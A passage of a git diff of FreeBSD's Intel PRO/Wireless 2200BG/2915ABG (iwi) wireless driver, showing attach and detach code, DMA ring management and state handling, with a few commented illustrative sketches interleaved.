ifp->if_softc; IPW_LOCK(sc); sc->flags &= ~IPW_FLAG_SCANNING; IPW_UNLOCK(sc); } diff --git a/sys/dev/iwi/if_iwi.c b/sys/dev/iwi/if_iwi.c index 9373c2feac35..f0133895a516 100644 --- a/sys/dev/iwi/if_iwi.c +++ b/sys/dev/iwi/if_iwi.c @@ -1,3589 +1,3589 @@ /*- * Copyright (c) 2004, 2005 * Damien Bergamini . All rights reserved. * Copyright (c) 2005-2006 Sam Leffler, Errno Consulting * Copyright (c) 2007 Andrew Thompson * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice unmodified, this list of conditions, and the following * disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include __FBSDID("$FreeBSD$"); /*- * Intel(R) PRO/Wireless 2200BG/2225BG/2915ABG driver * http://www.intel.com/network/connectivity/products/wireless/prowireless_mobile.htm */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define IWI_DEBUG #ifdef IWI_DEBUG #define DPRINTF(x) do { if (iwi_debug > 0) printf x; } while (0) #define DPRINTFN(n, x) do { if (iwi_debug >= (n)) printf x; } while (0) int iwi_debug = 0; SYSCTL_INT(_debug, OID_AUTO, iwi, CTLFLAG_RW, &iwi_debug, 0, "iwi debug level"); static const char *iwi_fw_states[] = { "IDLE", /* IWI_FW_IDLE */ "LOADING", /* IWI_FW_LOADING */ "ASSOCIATING", /* IWI_FW_ASSOCIATING */ "DISASSOCIATING", /* IWI_FW_DISASSOCIATING */ "SCANNING", /* IWI_FW_SCANNING */ }; #else #define DPRINTF(x) #define DPRINTFN(n, x) #endif MODULE_DEPEND(iwi, pci, 1, 1, 1); MODULE_DEPEND(iwi, wlan, 1, 1, 1); MODULE_DEPEND(iwi, firmware, 1, 1, 1); enum { IWI_LED_TX, IWI_LED_RX, IWI_LED_POLL, }; struct iwi_ident { uint16_t vendor; uint16_t device; const char *name; }; static const struct iwi_ident iwi_ident_table[] = { { 0x8086, 0x4220, "Intel(R) PRO/Wireless 2200BG" }, { 0x8086, 0x4221, "Intel(R) PRO/Wireless 2225BG" }, { 0x8086, 0x4223, "Intel(R) PRO/Wireless 2915ABG" }, { 0x8086, 0x4224, "Intel(R) PRO/Wireless 2915ABG" }, { 0, 0, NULL } }; static struct ieee80211vap *iwi_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void iwi_vap_delete(struct ieee80211vap 
*); static void iwi_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int iwi_alloc_cmd_ring(struct iwi_softc *, struct iwi_cmd_ring *, int); static void iwi_reset_cmd_ring(struct iwi_softc *, struct iwi_cmd_ring *); static void iwi_free_cmd_ring(struct iwi_softc *, struct iwi_cmd_ring *); static int iwi_alloc_tx_ring(struct iwi_softc *, struct iwi_tx_ring *, int, bus_addr_t, bus_addr_t); static void iwi_reset_tx_ring(struct iwi_softc *, struct iwi_tx_ring *); static void iwi_free_tx_ring(struct iwi_softc *, struct iwi_tx_ring *); static int iwi_alloc_rx_ring(struct iwi_softc *, struct iwi_rx_ring *, int); static void iwi_reset_rx_ring(struct iwi_softc *, struct iwi_rx_ring *); static void iwi_free_rx_ring(struct iwi_softc *, struct iwi_rx_ring *); static struct ieee80211_node *iwi_node_alloc(struct ieee80211vap *, const uint8_t [IEEE80211_ADDR_LEN]); static void iwi_node_free(struct ieee80211_node *); static void iwi_media_status(struct ifnet *, struct ifmediareq *); static int iwi_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void iwi_wme_init(struct iwi_softc *); static int iwi_wme_setparams(struct iwi_softc *, struct ieee80211com *); static void iwi_update_wme(void *, int); static int iwi_wme_update(struct ieee80211com *); static uint16_t iwi_read_prom_word(struct iwi_softc *, uint8_t); static void iwi_frame_intr(struct iwi_softc *, struct iwi_rx_data *, int, struct iwi_frame *); static void iwi_notification_intr(struct iwi_softc *, struct iwi_notif *); static void iwi_rx_intr(struct iwi_softc *); static void iwi_tx_intr(struct iwi_softc *, struct iwi_tx_ring *); static void iwi_intr(void *); static int iwi_cmd(struct iwi_softc *, uint8_t, void *, uint8_t); static void iwi_write_ibssnode(struct iwi_softc *, const u_int8_t [], int); static int iwi_tx_start(struct ifnet *, struct mbuf *, struct ieee80211_node *, int); static int iwi_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void iwi_start_locked(struct ifnet *); static void iwi_start(struct ifnet *); static void iwi_watchdog(void *); static int iwi_ioctl(struct ifnet *, u_long, caddr_t); static void iwi_stop_master(struct iwi_softc *); static int iwi_reset(struct iwi_softc *); static int iwi_load_ucode(struct iwi_softc *, const struct iwi_fw *); static int iwi_load_firmware(struct iwi_softc *, const struct iwi_fw *); static void iwi_release_fw_dma(struct iwi_softc *sc); static int iwi_config(struct iwi_softc *); static int iwi_get_firmware(struct iwi_softc *, enum ieee80211_opmode); static void iwi_put_firmware(struct iwi_softc *); static void iwi_monitor_scan(void *, int); static int iwi_scanchan(struct iwi_softc *, unsigned long, int); static void iwi_scan_start(struct ieee80211com *); static void iwi_scan_end(struct ieee80211com *); static void iwi_set_channel(struct ieee80211com *); static void iwi_scan_curchan(struct ieee80211_scan_state *, unsigned long maxdwell); static void iwi_scan_mindwell(struct ieee80211_scan_state *); static int iwi_auth_and_assoc(struct iwi_softc *, struct ieee80211vap *); static void iwi_disassoc(void *, int); static int iwi_disassociate(struct iwi_softc *, int quiet); static void iwi_init_locked(struct iwi_softc *); static void iwi_init(void *); static int iwi_init_fw_dma(struct iwi_softc *, int); static void iwi_stop_locked(void *); static void iwi_stop(struct iwi_softc *); static void iwi_restart(void *, int); static int iwi_getrfkill(struct iwi_softc *); static void iwi_radio_on(void *, int); static void 
iwi_radio_off(void *, int); static void iwi_sysctlattach(struct iwi_softc *); static void iwi_led_event(struct iwi_softc *, int); static void iwi_ledattach(struct iwi_softc *); static int iwi_probe(device_t); static int iwi_attach(device_t); static int iwi_detach(device_t); static int iwi_shutdown(device_t); static int iwi_suspend(device_t); static int iwi_resume(device_t); static device_method_t iwi_methods[] = { /* Device interface */ DEVMETHOD(device_probe, iwi_probe), DEVMETHOD(device_attach, iwi_attach), DEVMETHOD(device_detach, iwi_detach), DEVMETHOD(device_shutdown, iwi_shutdown), DEVMETHOD(device_suspend, iwi_suspend), DEVMETHOD(device_resume, iwi_resume), DEVMETHOD_END }; static driver_t iwi_driver = { "iwi", iwi_methods, sizeof (struct iwi_softc) }; static devclass_t iwi_devclass; DRIVER_MODULE(iwi, pci, iwi_driver, iwi_devclass, NULL, NULL); MODULE_VERSION(iwi, 1); static __inline uint8_t MEM_READ_1(struct iwi_softc *sc, uint32_t addr) { CSR_WRITE_4(sc, IWI_CSR_INDIRECT_ADDR, addr); return CSR_READ_1(sc, IWI_CSR_INDIRECT_DATA); } static __inline uint32_t MEM_READ_4(struct iwi_softc *sc, uint32_t addr) { CSR_WRITE_4(sc, IWI_CSR_INDIRECT_ADDR, addr); return CSR_READ_4(sc, IWI_CSR_INDIRECT_DATA); } static int iwi_probe(device_t dev) { const struct iwi_ident *ident; for (ident = iwi_ident_table; ident->name != NULL; ident++) { if (pci_get_vendor(dev) == ident->vendor && pci_get_device(dev) == ident->device) { device_set_desc(dev, ident->name); return (BUS_PROBE_DEFAULT); } } return ENXIO; } static int iwi_attach(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); struct ifnet *ifp; struct ieee80211com *ic; uint16_t val; int i, error; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); return ENXIO; } ic = ifp->if_l2com; IWI_LOCK_INIT(sc); sc->sc_unr = new_unrhdr(1, IWI_MAX_IBSSNODE-1, &sc->sc_mtx); TASK_INIT(&sc->sc_radiontask, 0, iwi_radio_on, sc); TASK_INIT(&sc->sc_radiofftask, 0, iwi_radio_off, sc); TASK_INIT(&sc->sc_restarttask, 0, iwi_restart, sc); TASK_INIT(&sc->sc_disassoctask, 0, iwi_disassoc, sc); TASK_INIT(&sc->sc_wmetask, 0, iwi_update_wme, sc); TASK_INIT(&sc->sc_monitortask, 0, iwi_monitor_scan, sc); callout_init_mtx(&sc->sc_wdtimer, &sc->sc_mtx, 0); callout_init_mtx(&sc->sc_rftimer, &sc->sc_mtx, 0); pci_write_config(dev, 0x41, 0, 1); /* enable bus-mastering */ pci_enable_busmaster(dev); i = PCIR_BAR(0); sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &i, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "could not allocate memory resource\n"); goto fail; } sc->sc_st = rman_get_bustag(sc->mem); sc->sc_sh = rman_get_bushandle(sc->mem); i = 0; sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &i, RF_ACTIVE | RF_SHAREABLE); if (sc->irq == NULL) { device_printf(dev, "could not allocate interrupt resource\n"); goto fail; } if (iwi_reset(sc) != 0) { device_printf(dev, "could not reset adapter\n"); goto fail; } /* * Allocate rings. 
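/*
 * Editor's sketch of the indirect-access idiom behind MEM_READ_1()/MEM_READ_4()
 * above: device memory outside the mapped register window is reached by
 * writing the target address to an "indirect address" register and then
 * reading the paired "indirect data" register.  reg_write()/reg_read() and
 * the two offsets are illustrative stand-ins for CSR_WRITE_4()/CSR_READ_4()
 * and the IWI_CSR_INDIRECT_* constants.
 */
#include <stdint.h>

#define SKETCH_INDIRECT_ADDR	0x08	/* illustrative register offsets */
#define SKETCH_INDIRECT_DATA	0x0c

extern void	reg_write(uint32_t off, uint32_t val);
extern uint32_t	reg_read(uint32_t off);

static uint32_t
indirect_read_4(uint32_t dev_addr)
{
	reg_write(SKETCH_INDIRECT_ADDR, dev_addr);	/* select the target address */
	return (reg_read(SKETCH_INDIRECT_DATA));	/* data port yields the word there */
}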
*/ if (iwi_alloc_cmd_ring(sc, &sc->cmdq, IWI_CMD_RING_COUNT) != 0) { device_printf(dev, "could not allocate Cmd ring\n"); goto fail; } for (i = 0; i < 4; i++) { error = iwi_alloc_tx_ring(sc, &sc->txq[i], IWI_TX_RING_COUNT, IWI_CSR_TX1_RIDX + i * 4, IWI_CSR_TX1_WIDX + i * 4); if (error != 0) { device_printf(dev, "could not allocate Tx ring %d\n", i+i); goto fail; } } if (iwi_alloc_rx_ring(sc, &sc->rxq, IWI_RX_RING_COUNT) != 0) { device_printf(dev, "could not allocate Rx ring\n"); goto fail; } iwi_wme_init(sc); ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = iwi_init; ifp->if_ioctl = iwi_ioctl; ifp->if_start = iwi_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_IBSS /* IBSS mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_PMGT /* power save supported */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_WPA /* 802.11i */ | IEEE80211_C_WME /* 802.11e */ #if 0 | IEEE80211_C_BGSCAN /* capable of bg scanning */ #endif ; /* read MAC address from EEPROM */ val = iwi_read_prom_word(sc, IWI_EEPROM_MAC + 0); macaddr[0] = val & 0xff; macaddr[1] = val >> 8; val = iwi_read_prom_word(sc, IWI_EEPROM_MAC + 1); macaddr[2] = val & 0xff; macaddr[3] = val >> 8; val = iwi_read_prom_word(sc, IWI_EEPROM_MAC + 2); macaddr[4] = val & 0xff; macaddr[5] = val >> 8; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (pci_get_device(dev) >= 0x4223) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); /* override default methods */ ic->ic_node_alloc = iwi_node_alloc; sc->sc_node_free = ic->ic_node_free; ic->ic_node_free = iwi_node_free; ic->ic_raw_xmit = iwi_raw_xmit; ic->ic_scan_start = iwi_scan_start; ic->ic_scan_end = iwi_scan_end; ic->ic_set_channel = iwi_set_channel; ic->ic_scan_curchan = iwi_scan_curchan; ic->ic_scan_mindwell = iwi_scan_mindwell; ic->ic_wme.wme_update = iwi_wme_update; ic->ic_vap_create = iwi_vap_create; ic->ic_vap_delete = iwi_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), IWI_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), IWI_RX_RADIOTAP_PRESENT); iwi_sysctlattach(sc); iwi_ledattach(sc); /* * Hook our interrupt after all initialization is complete. 
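/*
 * Editor's sketch of the MAC-address extraction above: the EEPROM stores the
 * address as three 16-bit words, low byte first, so each word supplies two
 * consecutive octets.  read_prom_word() stands in for iwi_read_prom_word()
 * and `base` for IWI_EEPROM_MAC; both are illustrative only.
 */
#include <stdint.h>

extern uint16_t	read_prom_word(uint8_t addr);

static void
prom_macaddr(uint8_t macaddr[6], uint8_t base)
{
	int i;

	for (i = 0; i < 3; i++) {
		uint16_t val = read_prom_word(base + i);

		macaddr[2 * i]     = val & 0xff;	/* low byte first */
		macaddr[2 * i + 1] = val >> 8;		/* then high byte */
	}
}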
*/ error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET | INTR_MPSAFE, NULL, iwi_intr, sc, &sc->sc_ih); if (error != 0) { device_printf(dev, "could not set up interrupt\n"); goto fail; } if (bootverbose) ieee80211_announce(ic); return 0; fail: /* XXX fix */ iwi_detach(dev); return ENXIO; } static int iwi_detach(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; bus_teardown_intr(dev, sc->irq, sc->sc_ih); /* NB: do early to drain any pending tasks */ ieee80211_draintask(ic, &sc->sc_radiontask); ieee80211_draintask(ic, &sc->sc_radiofftask); ieee80211_draintask(ic, &sc->sc_restarttask); ieee80211_draintask(ic, &sc->sc_disassoctask); ieee80211_draintask(ic, &sc->sc_monitortask); iwi_stop(sc); ieee80211_ifdetach(ic); iwi_put_firmware(sc); iwi_release_fw_dma(sc); iwi_free_cmd_ring(sc, &sc->cmdq); iwi_free_tx_ring(sc, &sc->txq[0]); iwi_free_tx_ring(sc, &sc->txq[1]); iwi_free_tx_ring(sc, &sc->txq[2]); iwi_free_tx_ring(sc, &sc->txq[3]); iwi_free_rx_ring(sc, &sc->rxq); bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); delete_unrhdr(sc->sc_unr); IWI_LOCK_DESTROY(sc); if_free(ifp); return 0; } static struct ieee80211vap * iwi_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; struct iwi_vap *ivp; struct ieee80211vap *vap; int i; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; /* * Get firmware image (and possibly dma memory) on mode change. */ if (iwi_get_firmware(sc, opmode)) return NULL; /* allocate DMA memory for mapping firmware image */ i = sc->fw_fw.size; if (sc->fw_boot.size > i) i = sc->fw_boot.size; /* XXX do we dma the ucode as well ? 
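/*
 * Editor's illustration of the sizing logic just above: one DMA area is
 * reused for the boot, microcode and runtime images, so it only needs to be
 * as large as the biggest of the three.  The struct is a sketch of the
 * sc->fw_boot/fw_uc/fw_fw sizes, not the driver's types.
 */
#include <stddef.h>

struct fw_sizes_sketch {
	size_t	boot;		/* sc->fw_boot.size */
	size_t	uc;		/* sc->fw_uc.size */
	size_t	fw;		/* sc->fw_fw.size */
};

static size_t
fw_dma_size(const struct fw_sizes_sketch *s)
{
	size_t max = s->fw;

	if (s->boot > max)
		max = s->boot;
	if (s->uc > max)	/* the ucode image is mapped through it as well */
		max = s->uc;
	return (max);		/* the size handed to iwi_init_fw_dma() */
}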
*/ if (sc->fw_uc.size > i) i = sc->fw_uc.size; if (iwi_init_fw_dma(sc, i)) return NULL; ivp = (struct iwi_vap *) malloc(sizeof(struct iwi_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (ivp == NULL) return NULL; vap = &ivp->iwi_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override the default, the setting comes from the linux driver */ vap->iv_bmissthreshold = 24; /* override with driver methods */ ivp->iwi_newstate = vap->iv_newstate; vap->iv_newstate = iwi_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, iwi_media_status); ic->ic_opmode = opmode; return vap; } static void iwi_vap_delete(struct ieee80211vap *vap) { struct iwi_vap *ivp = IWI_VAP(vap); ieee80211_vap_detach(vap); free(ivp, M_80211_VAP); } static void iwi_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int iwi_alloc_cmd_ring(struct iwi_softc *sc, struct iwi_cmd_ring *ring, int count) { int error; ring->count = count; ring->queued = 0; ring->cur = ring->next = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * IWI_CMD_DESC_SIZE, 1, count * IWI_CMD_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * IWI_CMD_DESC_SIZE, iwi_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } return 0; fail: iwi_free_cmd_ring(sc, ring); return error; } static void iwi_reset_cmd_ring(struct iwi_softc *sc, struct iwi_cmd_ring *ring) { ring->queued = 0; ring->cur = ring->next = 0; } static void iwi_free_cmd_ring(struct iwi_softc *sc, struct iwi_cmd_ring *ring) { if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); } static int iwi_alloc_tx_ring(struct iwi_softc *sc, struct iwi_tx_ring *ring, int count, bus_addr_t csr_ridx, bus_addr_t csr_widx) { int i, error; ring->count = count; ring->queued = 0; ring->cur = ring->next = 0; ring->csr_ridx = csr_ridx; ring->csr_widx = csr_widx; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * IWI_TX_DESC_SIZE, 1, count * IWI_TX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * IWI_TX_DESC_SIZE, iwi_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct iwi_tx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data 
== NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, IWI_MAX_NSEG, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { error = bus_dmamap_create(ring->data_dmat, 0, &ring->data[i].map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } } return 0; fail: iwi_free_tx_ring(sc, ring); return error; } static void iwi_reset_tx_ring(struct iwi_softc *sc, struct iwi_tx_ring *ring) { struct iwi_tx_data *data; int i; for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } ring->queued = 0; ring->cur = ring->next = 0; } static void iwi_free_tx_ring(struct iwi_softc *sc, struct iwi_tx_ring *ring) { struct iwi_tx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->ni != NULL) ieee80211_free_node(data->ni); if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int iwi_alloc_rx_ring(struct iwi_softc *sc, struct iwi_rx_ring *ring, int count) { struct iwi_rx_data *data; int i, error; ring->count = count; ring->cur = 0; ring->data = malloc(count * sizeof (struct iwi_rx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { data = &ring->data[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), MCLBYTES, iwi_dma_map_addr, &data->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load rx buf DMA map"); goto fail; } data->reg = IWI_CSR_RX_BASE + i * 4; } return 0; fail: iwi_free_rx_ring(sc, ring); return error; } static void iwi_reset_rx_ring(struct iwi_softc *sc, struct iwi_rx_ring *ring) { ring->cur = 0; } static void iwi_free_rx_ring(struct iwi_softc *sc, struct iwi_rx_ring *ring) { struct iwi_rx_data *data; int i; if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = 
&ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int iwi_shutdown(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); iwi_stop(sc); iwi_put_firmware(sc); /* ??? XXX */ return 0; } static int iwi_suspend(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; ieee80211_suspend_all(ic); return 0; } static int iwi_resume(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; pci_write_config(dev, 0x41, 0, 1); ieee80211_resume_all(ic); return 0; } static struct ieee80211_node * iwi_node_alloc(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { struct iwi_node *in; in = malloc(sizeof (struct iwi_node), M_80211_NODE, M_NOWAIT | M_ZERO); if (in == NULL) return NULL; /* XXX assign sta table entry for adhoc */ in->in_station = -1; return &in->in_node; } static void iwi_node_free(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct iwi_softc *sc = ic->ic_ifp->if_softc; struct iwi_node *in = (struct iwi_node *)ni; if (in->in_station != -1) { DPRINTF(("%s mac %6D station %u\n", __func__, ni->ni_macaddr, ":", in->in_station)); free_unr(sc->sc_unr, in->in_station); } sc->sc_node_free(ni); } /* * Convert h/w rate code to IEEE rate code. */ static int iwi_cvtrate(int iwirate) { switch (iwirate) { case IWI_RATE_DS1: return 2; case IWI_RATE_DS2: return 4; case IWI_RATE_DS5: return 11; case IWI_RATE_DS11: return 22; case IWI_RATE_OFDM6: return 12; case IWI_RATE_OFDM9: return 18; case IWI_RATE_OFDM12: return 24; case IWI_RATE_OFDM18: return 36; case IWI_RATE_OFDM24: return 48; case IWI_RATE_OFDM36: return 72; case IWI_RATE_OFDM48: return 96; case IWI_RATE_OFDM54: return 108; } return 0; } /* * The firmware automatically adapts the transmit speed. We report its current * value here. */ static void iwi_media_status(struct ifnet *ifp, struct ifmediareq *imr) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; struct iwi_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_node *ni; /* read current transmission rate from adapter */ ni = ieee80211_ref_node(vap->iv_bss); ni->ni_txrate = iwi_cvtrate(CSR_READ_4(sc, IWI_CSR_CURRENT_TX_RATE)); ieee80211_free_node(ni); ieee80211_media_status(ifp, imr); } static int iwi_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct iwi_vap *ivp = IWI_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; IWI_LOCK_DECL; DPRINTF(("%s: %s -> %s flags 0x%x\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate], sc->flags)); IEEE80211_UNLOCK(ic); IWI_LOCK(sc); switch (nstate) { case IEEE80211_S_INIT: /* * NB: don't try to do this if iwi_stop_master has * shutdown the firmware and disabled interrupts. */ if (vap->iv_state == IEEE80211_S_RUN && (sc->flags & IWI_FLAG_FW_INITED)) iwi_disassociate(sc, 0); break; case IEEE80211_S_AUTH: iwi_auth_and_assoc(sc, vap); break; case IEEE80211_S_RUN: if (vap->iv_opmode == IEEE80211_M_IBSS && vap->iv_state == IEEE80211_S_SCAN) { /* * XXX when joining an ibss network we are called * with a SCAN -> RUN transition on scan complete. 
